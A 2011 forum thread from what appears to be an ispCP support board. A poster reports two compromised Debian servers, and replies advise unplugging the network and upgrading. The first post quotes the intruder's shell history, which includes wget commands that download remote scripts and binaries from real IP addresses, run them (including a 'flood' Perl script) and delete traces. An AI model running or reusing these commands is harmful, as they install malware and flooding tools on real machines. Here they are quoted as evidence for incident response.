Current time: 11-27-2024, 04:25 PM Hello There, Guest! (LoginRegister)


Post Reply 
2 Omega boxes hacked...
Author Message
robmorin Offline
Junior Member
*

Posts: 208
Joined: Apr 2007
Reputation: 0
Post: #1
2 Omega boxes hacked...
Hello all long time no post Smile

I had a friend call me to say he had 2 Debain servers acting funny , it turns out they were both hacked and both servers run ISPCP

Both server had weird running perl scripts and httpd binaries running as user vu2000

he is using version
ispCP 1.0.0 RC7 OMEGA
build: 20081212
Priamos

that user has no shell in passwd file, however the .bash_history file for that user on both boxes had this in it

/sbin/ifconfig|grep inet
cd /dev/shm
wget http://72.167.35.180/.x/ldaudit_pcprofile.sh ; sh ldaudit_pcprofile.sh
cd /dev/shm
ls
rm -rf *
ls -al
cd /tmp
ls -a
cd .ICE-unix
ls -a
wget http://208.75.230.43/bulanul/L;tar zxvf L;rm -rf L;cd .l;./a
cd ..
rm -rf .l
wget http://208.75.230.43/bulanul/flood;perl flood;rm -rf flood

There must be an exploit somewhere...

Now i left one box running hacked still as to maybe find more info to help out in case it is an exploit... so whats the next step?

Thanks...
05-06-2011 02:00 AM
Find all posts by this user Quote this message in a reply
fluser Offline
Documentation Team
***
Docu Team

Posts: 246
Joined: May 2010
Reputation: 1
Post: #2
RE: 2 Omega boxes hacked...
Cut the network cable! That would be the first thing.
05-06-2011 07:09 PM
Find all posts by this user Quote this message in a reply
c0urier Offline
Junior Member
*

Posts: 89
Joined: Jun 2007
Reputation: 1
Post: #3
RE: 2 Omega boxes hacked...
As far as I know there has been several exploits since 1.0.0-RC7 - Ever thought about upgradeing to a newer version ex. 1.0.7?
(This post was last modified: 05-07-2011 12:26 AM by c0urier.)
05-07-2011 12:25 AM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)